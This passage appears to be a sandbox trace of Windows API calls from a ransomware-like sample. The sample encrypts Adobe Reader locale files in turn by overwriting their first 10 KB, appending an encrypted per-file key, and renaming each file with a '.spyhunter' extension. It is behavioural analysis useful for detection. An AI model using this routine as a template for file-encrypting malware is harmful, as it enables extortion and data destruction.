hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0114.933] GetProcessHeap () returned 0x2c0000 [0114.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0d380 | out: hHeap=0x2c0000) returned 1 [0114.934] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6e0 | out: pbBuffer=0x270f6e0) returned 1 [0114.934] GetProcessHeap () returned 0x2c0000 [0114.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0114.934] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6d8*=0x30) returned 1 [0114.935] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\WebLink.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\weblink.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0114.936] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\WebLink.EUQ") returned 76 [0114.936] StrStrW (lpFirst="WebLink.EUQ", lpSrch=".txt") returned 0x0 [0114.936] GetProcessHeap () returned 0x2c0000 [0114.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0114.936] ReadFile (in: hFile=0x120, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f69c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f69c*=0x2800, lpOverlapped=0x0) returned 1 [0114.952] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.953] WriteFile (in: hFile=0x120, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f69c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f69c*=0x2800, lpOverlapped=0x0) returned 1 [0114.953] GetProcessHeap () returned 0x2c0000 [0114.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0114.953] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.953] WriteFile (in: hFile=0x120, lpBuffer=0x270f6dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f69c, lpOverlapped=0x0 | out: lpBuffer=0x270f6dc*, lpNumberOfBytesWritten=0x270f69c*=0x4, lpOverlapped=0x0) returned 1 [0114.969] WriteFile (in: hFile=0x120, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f69c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f69c*=0x30, lpOverlapped=0x0) returned 1 [0114.969] CloseHandle (hObject=0x120) returned 1 [0114.969] GetProcessHeap () returned 0x2c0000 [0114.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0114.969] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\WebLink.EUQ.spyhunter") returned 86 [0114.969] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\WebLink.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\weblink.euq"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\WebLink.EUQ.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\weblink.euq.spyhunter")) returned 1 [0114.970] GetProcessHeap () returned 0x2c0000 [0114.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0114.970] GetProcessHeap () returned 0x2c0000 [0114.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0114.970] GetProcessHeap () returned 0x2c0000 [0114.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e13f90 | out: hHeap=0x2c0000) returned 1 [0115.008] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6d8 | out: pbBuffer=0x270f6d8) returned 1 [0115.008] GetProcessHeap () returned 0x2c0000 [0115.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0115.008] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6d0*=0x30) returned 1 [0115.008] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Search.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\search.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0115.009] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Search.EUQ") returned 75 [0115.009] StrStrW (lpFirst="Search.EUQ", lpSrch=".txt") returned 0x0 [0115.009] GetProcessHeap () returned 0x2c0000 [0115.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0115.009] ReadFile (in: hFile=0xf4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f694, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f694*=0x2800, lpOverlapped=0x0) returned 1 [0115.010] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.010] WriteFile (in: hFile=0xf4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f694, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f694*=0x2800, lpOverlapped=0x0) returned 1 [0115.010] GetProcessHeap () returned 0x2c0000 [0115.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0115.010] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.010] WriteFile (in: hFile=0xf4, lpBuffer=0x270f6d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f694, lpOverlapped=0x0 | out: lpBuffer=0x270f6d4*, lpNumberOfBytesWritten=0x270f694*=0x4, lpOverlapped=0x0) returned 1 [0115.247] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f694, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f694*=0x30, lpOverlapped=0x0) returned 1 [0115.247] CloseHandle (hObject=0xf4) returned 1 [0115.247] GetProcessHeap () returned 0x2c0000 [0115.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0115.248] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Search.EUQ.spyhunter") returned 85 [0115.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Search.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\search.euq"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Search.EUQ.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\search.euq.spyhunter")) returned 1 [0115.257] GetProcessHeap () returned 0x2c0000 [0115.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0115.257] GetProcessHeap () returned 0x2c0000 [0115.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0115.257] GetProcessHeap () returned 0x2c0000 [0115.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e77c70 | out: hHeap=0x2c0000) returned 1 [0115.258] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6d0 | out: pbBuffer=0x270f6d0) returned 1 [0115.258] GetProcessHeap () returned 0x2c0000 [0115.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0115.259] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6c8*=0x30) returned 1 [0115.259] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Weblink.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\weblink.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0115.260] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Weblink.SUO") returned 76 [0115.260] StrStrW (lpFirst="Weblink.SUO", lpSrch=".txt") returned 0x0 [0115.260] GetProcessHeap () returned 0x2c0000 [0115.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0115.260] ReadFile (in: hFile=0xf4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f68c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f68c*=0x2800, lpOverlapped=0x0) returned 1 [0115.304] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.305] WriteFile (in: hFile=0xf4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f68c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f68c*=0x2800, lpOverlapped=0x0) returned 1 [0115.305] GetProcessHeap () returned 0x2c0000 [0115.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0115.305] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.305] WriteFile (in: hFile=0xf4, lpBuffer=0x270f6cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f68c, lpOverlapped=0x0 | out: lpBuffer=0x270f6cc*, lpNumberOfBytesWritten=0x270f68c*=0x4, lpOverlapped=0x0) returned 1 [0115.323] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f68c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f68c*=0x30, lpOverlapped=0x0) returned 1 [0115.323] CloseHandle (hObject=0xf4) returned 1 [0115.323] GetProcessHeap () returned 0x2c0000 [0115.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0115.323] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Weblink.SUO.spyhunter") returned 86 [0115.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Weblink.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\weblink.suo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Weblink.SUO.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\weblink.suo.spyhunter")) returned 1 [0115.324] GetProcessHeap () returned 0x2c0000 [0115.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0115.324] GetProcessHeap () returned 0x2c0000 [0115.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0115.324] GetProcessHeap () returned 0x2c0000 [0115.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e148a0 | out: hHeap=0x2c0000) returned 1 [0115.324] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6c8 | out: pbBuffer=0x270f6c8) returned 1 [0115.324] GetProcessHeap () returned 0x2c0000 [0115.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0115.324] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6c0*=0x30) returned 1 [0115.324] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\updater.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\updater.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0115.327] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\updater.SUO") returned 76 [0115.327] StrStrW (lpFirst="updater.SUO", lpSrch=".txt") returned 0x0 [0115.327] GetProcessHeap () returned 0x2c0000 [0115.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0115.328] ReadFile (in: hFile=0xf4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f684, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f684*=0x2800, lpOverlapped=0x0) returned 1 [0115.400] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.400] WriteFile (in: hFile=0xf4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f684, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f684*=0x2800, lpOverlapped=0x0) returned 1 [0115.400] GetProcessHeap () returned 0x2c0000 [0115.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0115.400] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.400] WriteFile (in: hFile=0xf4, lpBuffer=0x270f6c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f684, lpOverlapped=0x0 | out: lpBuffer=0x270f6c4*, lpNumberOfBytesWritten=0x270f684*=0x4, lpOverlapped=0x0) returned 1 [0115.400] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f684, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f684*=0x30, lpOverlapped=0x0) returned 1 [0115.400] CloseHandle (hObject=0xf4) returned 1 [0115.401] GetProcessHeap () returned 0x2c0000 [0115.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0115.401] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\updater.SUO.spyhunter") returned 86 [0115.401] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\updater.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\updater.suo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\updater.SUO.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\updater.suo.spyhunter")) returned 1 [0115.401] GetProcessHeap () returned 0x2c0000 [0115.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0115.402] GetProcessHeap () returned 0x2c0000 [0115.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0115.402] GetProcessHeap () returned 0x2c0000 [0115.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e147b8 | out: hHeap=0x2c0000) returned 1 [0115.402] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6c8 | out: pbBuffer=0x270f6c8) returned 1 [0115.402] GetProcessHeap () returned 0x2c0000 [0115.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0115.402] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6c0*=0x30) returned 1 [0115.402] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Spelling.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\spelling.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0115.532] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Spelling.SUO") returned 77 [0115.532] StrStrW (lpFirst="Spelling.SUO", lpSrch=".txt") returned 0x0 [0115.532] GetProcessHeap () returned 0x2c0000 [0115.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0115.532] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f684, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f684*=0x2800, lpOverlapped=0x0) returned 1 [0115.579] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.579] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f684, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f684*=0x2800, lpOverlapped=0x0) returned 1 [0115.580] GetProcessHeap () returned 0x2c0000 [0115.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0115.580] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.580] WriteFile (in: hFile=0xec, lpBuffer=0x270f6c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f684, lpOverlapped=0x0 | out: lpBuffer=0x270f6c4*, lpNumberOfBytesWritten=0x270f684*=0x4, lpOverlapped=0x0) returned 1 [0115.580] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f684, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f684*=0x30, lpOverlapped=0x0) returned 1 [0115.580] CloseHandle (hObject=0xec) returned 1 [0115.580] GetProcessHeap () returned 0x2c0000 [0115.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0115.580] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Spelling.SUO.spyhunter") returned 87 [0115.581] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Spelling.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\spelling.suo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Spelling.SUO.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\spelling.suo.spyhunter")) returned 1 [0115.610] GetProcessHeap () returned 0x2c0000 [0115.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0115.610] GetProcessHeap () returned 0x2c0000 [0115.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0115.610] GetProcessHeap () returned 0x2c0000 [0115.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e146d0 | out: hHeap=0x2c0000) returned 1 [0115.610] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6c0 | out: pbBuffer=0x270f6c0) returned 1 [0115.610] GetProcessHeap () returned 0x2c0000 [0115.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0115.610] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6b8*=0x30) returned 1 [0115.610] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Spelling.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\spelling.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0115.690] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Spelling.FRA") returned 77 [0115.690] StrStrW (lpFirst="Spelling.FRA", lpSrch=".txt") returned 0x0 [0115.691] GetProcessHeap () returned 0x2c0000 [0115.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0115.691] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f67c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f67c*=0x2800, lpOverlapped=0x0) returned 1 [0115.809] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.809] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f67c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f67c*=0x2800, lpOverlapped=0x0) returned 1 [0115.809] GetProcessHeap () returned 0x2c0000 [0115.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0115.809] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.809] WriteFile (in: hFile=0xec, lpBuffer=0x270f6bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f67c, lpOverlapped=0x0 | out: lpBuffer=0x270f6bc*, lpNumberOfBytesWritten=0x270f67c*=0x4, lpOverlapped=0x0) returned 1 [0115.809] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f67c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f67c*=0x30, lpOverlapped=0x0) returned 1 [0115.809] CloseHandle (hObject=0xec) returned 1 [0115.809] GetProcessHeap () returned 0x2c0000 [0115.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0115.809] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Spelling.FRA.spyhunter") returned 87 [0115.809] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Spelling.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\spelling.fra"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Spelling.FRA.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\spelling.fra.spyhunter")) returned 1 [0115.810] GetProcessHeap () returned 0x2c0000 [0115.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0115.810] GetProcessHeap () returned 0x2c0000 [0115.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0115.810] GetProcessHeap () returned 0x2c0000 [0115.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e14ef8 | out: hHeap=0x2c0000) returned 1 [0115.811] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6b8 | out: pbBuffer=0x270f6b8) returned 1 [0115.811] GetProcessHeap () returned 0x2c0000 [0115.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0115.811] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6b0*=0x30) returned 1 [0115.811] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Weblink.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 